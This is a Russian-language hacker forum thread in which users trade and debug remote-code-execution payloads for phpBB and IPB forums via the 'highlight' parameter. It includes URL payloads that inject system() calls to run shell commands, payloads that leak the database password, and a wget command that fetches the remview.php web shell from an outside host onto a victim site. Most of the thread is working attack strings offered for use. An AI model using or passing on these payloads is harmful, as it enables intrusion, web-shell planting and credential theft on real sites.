wget - заливка файла на сайт
ls - просмотр файлов в папке
ls -la - полный просмотр с правами доступа))
перемещение по каталогам, команда: cd
cd .. - перемещение на каталог выше
wget http://hompaga.ru/remview.php - зальёт тебе remview.php на сайт..

Можно на примере
http://[Target]/forum/index.php?showtopic=[№]?
Это пример IPB форума ну и остальные аналогично...
Как я понял, что опирирование идёт по средствам адресной строки браузера и всё?

&highlight=%2527.$poster=`pwd`.%2527 Это как я понял выдаёт дирикторию
Далее это параметры мускула так?
&highlight=%2527.$poster=`bdname`.%2527
&highlight=%2527.$poster=`bdpass`.%2527
Просмотр попок для записи
&highlight=%2527.$poster=`&cmd`.%2527&cmd=cd ..;ls -l

Короче поправте если что то накарябал нетак... =\

Во! Нашёл http://forum.antichat.ru/showthread.php?t=5076

ЕЕЕЕЕЕЕЕЕЕЕ Я щас убью когото.
Последний раз говорю.
Если ктокто придумал такой сплойт это не значит что он работает!
`ls` не разрешено если не safe mode.
Вот так можно
viewtopic.php?command=uname -a;ls -la&t=10&highlight=%2527.system($_GET[command]).include%2527
ЕЩЁ РАЗ. В конце остается кусок )b# типа того. Он идет в system() т.к. там без скобок.
Поэтому я его сую в ф-ию которая НИЧЕ не возвращает!

Вообщем уже много людей хотят со мной пообщаться по поводу include в конце. Стучите в асю. И все считают что я не то написал. И потом вылезает ошибка Cannot include ")b#"
Все правильно!
Если надо узнать пароль\логин к базе
http://.../viewtopic.php?t=10&highlight=%2527.$poster=$dbpass wd.%2527

Ок! Спасибо братуха Разобрался!

Пожалуста... надо в новостях это подправить ))